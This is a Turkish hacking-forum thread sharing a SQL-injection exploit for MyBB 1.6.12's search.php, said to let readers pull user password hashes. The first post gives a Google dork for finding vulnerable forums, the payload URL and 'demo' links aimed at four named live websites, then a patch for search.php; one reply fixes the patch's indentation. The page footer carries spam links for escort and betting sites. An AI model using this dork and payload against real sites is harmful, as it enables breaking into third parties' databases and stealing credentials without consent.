MYBB 1.6.12 SQL

K

K53U

Yeni Üye
Katılım
8 Mar 2014
Mesajlar
15
Tepkime puanı
0
Puanları
0
meraba arkadaslar forumda yeniyim umarim kalici olurum ilk paylaşimi mi size sunuyorum.

mybb'nin son surumunde bu acık mevcuttur useer hash cekilebilir.

Exploit :

Kod: 
Google Dork: intext:"powered by Mybb"
search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

Demo :
Kod: 
http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

http://www.mybb.fr/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

http://my-bb.ir/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

birtane de heçkir sitesinden demo vereyim : 
http://whitesecurity.org/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

açıgı kapatmak icin sitenizde mybb kurulu dizinde search.php yi acin
bu kod ile
Kod: 
$sid = $db->escape_string($mybb->input['sid']);

Bu kodu degistirin
Kod: 
if(is_array($mybb->input['sid']))
$sid = $db->escape_string(implode($mybb->input['sid']));
else
$sid = $db->escape_string($mybb->input['sid']);
 
Kzsg

Kzsg

Prof Spys-z
Katılım
28 Ara 2013
Mesajlar
946
Tepkime puanı
0
Puanları
0
eline sağlık kardeşim
 
D

dcy

Yeni Üye
Katılım
2 Kas 2013
Mesajlar
26
Tepkime puanı
0
Puanları
0
sağolasın ama böyle düzeltince olmadı her satırın başına boşluk koymam gerekti. T_STRİNG diye bir hata aldım boşluk koyunca düzeldi şu şekilde.
Kod: 
	if(is_array($mybb->input['sid']))
	$sid = $db->escape_string(implode($mybb->input['sid']));
	else
	$sid = $db->escape_string($mybb->input['sid']);
 
Cevap yazmak için giriş yap yada kayıt ol.

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012